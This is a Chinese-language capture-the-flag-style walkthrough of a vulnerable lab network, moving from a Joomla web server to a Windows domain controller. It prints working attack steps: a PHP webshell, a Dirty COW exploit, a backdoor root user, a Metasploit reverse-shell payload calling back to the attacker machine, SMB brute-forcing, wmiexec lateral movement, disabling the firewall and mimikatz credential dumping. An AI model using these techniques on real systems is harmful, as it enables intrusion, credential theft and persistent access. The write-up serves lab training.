靶機下載地址
漏洞詳情
目標:域控中存在一份重要檔案,
本次環境為黑盒測驗,不提供虛擬機賬號密碼
環境配置
攻擊機kali: 192.168.1.109
web-centos:192.168.1.110
192.168.93.100
Web1-ubantu:192.168.93.120
pc:192.168.93.30
Win2008:192.168.93.20
Windows server 2012:192.168.93.10
外網ip段:192.168.1.0/24 橋接分配即可
內網ip段:192.168.93.0/24 這個下載好靶機開啟就行了 這里ip是分配好的
先nmap -sP 掃描網段存活主機
109是攻擊機kali 噠ip
初步判斷 110就是我們要攻擊的靶機了 ^_^
下面進行單獨掃描
這里發現開了mysql資料庫服務 遠程ssh服務連接 web網站
居然有web網站那就去訪問ip看看啦
這里發現是joomla CMS ,于是用kali里自帶的 joomscan漏洞目錄掃描工具
Joomscan -u http://192.168.1.110/
和組態檔 http://192.168.1.110/configuration.php~
提示檔案 http://192.168.1.110/robots.txt
在這個檔案中宣告該網站中不想被robot訪問的部分 也會宣告可以訪問的部分與提示
下面先訪問一下robots.txt
發現administrator目錄是
這里我們就進去瞅瞅 逼近不可告人的都是秘密
于是發現了用戶登錄的界面 但是我用弱密碼嘗試了幾下 發現不行
然后就只能另尋蹊徑了
然后再訪問一下configuration.php~目錄
終于皇天不負有心人 讓我看到了mysql資料庫連接密碼 嗚哈哈
下面我使用Navicat進行資料庫連接
然后對joomla資料庫進行添加用戶
并在usergroup加入剛才添加的root用戶 密碼secret
secret加密后:d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199
這里不加密是不成功的
group_id 8 就是超級用戶權限
使用剛才添加的用戶去登錄
然后在里面寫上一句話木馬使用蟻劍連接 在這里我掉坑了
我一開始認為index.php就在administrator目錄下面 然后我連了幾下發現不對 于是看到保存檔案的提示
提示說index.php 在template/beez3里面 害
害 這里發現禁用命令
但是還是有一點識訓的 發現這里是ubuntu內核 而不上web-centos的
說明真正的 web 服務后端在 ubuntu
于是新建一個檔案 PHPinfo
的確禁止命令執行操作了
這樣就可以使用啦 (^v^)
Ip不一致這不就證實了 后端是ubuntu
然后有去1.110目錄里翻了翻
得知賬戶密碼 就去ssh嘗試登錄一下 然后登錄成功了
但是權限不夠吖
拿到出網機后想繼續橫向移動,一般是在跳板機搭建 socks 代理,所以需要將 centos 提權,查看 centos 內核版可以臟牛提權
exp 下載地址: GitHub - FireFart/dirtycow
下載好之后上傳到centos里
上傳的方式很多用
scp 要上傳的檔案路徑 wwwuser@192.168.1.110:/home/wwwuser 也可以
使用gcc -pthread dirty.c -o dirty -lcrypt
然后執行./dirty [密碼]
這里需要洗掉原來的 不然無法生成 想換一個密碼就把以前的洗掉了從新生成 即可
查看權限 提權成功!
權限維持添加root用戶后門
#創建一個用戶名administrator 密碼haha 的后門用戶
方法一.
拿centos msf上線
use exploit/multi/script/web_delivery
set target 7 # 選擇目標系統,不知道的show targets一下
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 6666
run
把這個復制到 遠程登錄的centos里執行一下
成功反彈!
方法二.
使用kali生成 payload檔案 上傳到centos進行提權
開啟msf監聽埠 然后操作centos 執行上傳的shell.elf
設定一下到 192.168.93.0/24網段的路由 設定代理去掃描93.0/24網段
use auxiliary/scanner/smb/smb_version #進入掃描93.0/24網段存活主機
set rhosts 192.168.93.0/24
Exploit
這里掃描出 192.168.93.10 :windows 2012 R2
192.168.93.20 :windows 2008
192.168.93.30 :windows 7
下面使用代理對10\20\30進行 nmap掃描
發現三臺主機開放了135、445埠
然后嘗試了永恒之藍 但是沒有成功
| 下面使用smb嘗試爆破 use auxiliary/scanner/smb/smb_login set rhosts 192.168.93.30 set SMBUser administrator set PASS_FILE /usr/share/wordlists/top1000.txt |
run
爆出密碼:123qwe!ASD
然后跑了一下20的 密碼也是123qwe!ASD
但是10的沒有跑出來
wni出現在windows作業系統里 用于管理本地或遠程的windows系統
而且wmi攻擊windows 系統日志不會記錄這些操作,也就是說無日志
wmiexec 執行命令,搜集資訊,參考:wmiexec.py 下載地址: https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
這里大家不要迷糊呦
進入python目錄然后執行以下命令
git clone https://github.com/CoreSecurity/impacket.git
Cd impacket/
pip install . (.點前面要加兩個空格)
如果還出錯嘗試apt-get install python3-pip
裝好之后進入example目錄下 執行wmiexec.py 拿到win2008的shell
| proxychains python3 wmiexec.py -debug 'administrator:123qwe!ASD@192.168.93.20' |
然后在收集一下資訊
然后得知域控ip是10
然后關閉一下20防火墻
| netsh firewall set opmode mode=disable |
開一下3389
嘗試遠程登錄
https://github.com/gentilkiwi/mimikatz 下載地址
這里通過代理是可以登錄的 但是上傳不了mimikatz
發現test域行程管理員,嘗試抓取密碼
下面在kali上使用smbclient 連接到windows 2008上傳mimikatz
然后 put mimikatz.exe
| mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log |
得到test 域管理員密碼 :zxcASDqw123!!
ipc遠程連接
是共享“命名管道”的資源,它是為了讓行程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用,
利用IPC$連接者可以與目標主機建立一個連接,得到目標主機上的目錄結構、用戶串列等資訊,
利用條件:管理員開啟了默認共享 139或445埠開放
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/394147.html
標籤:其他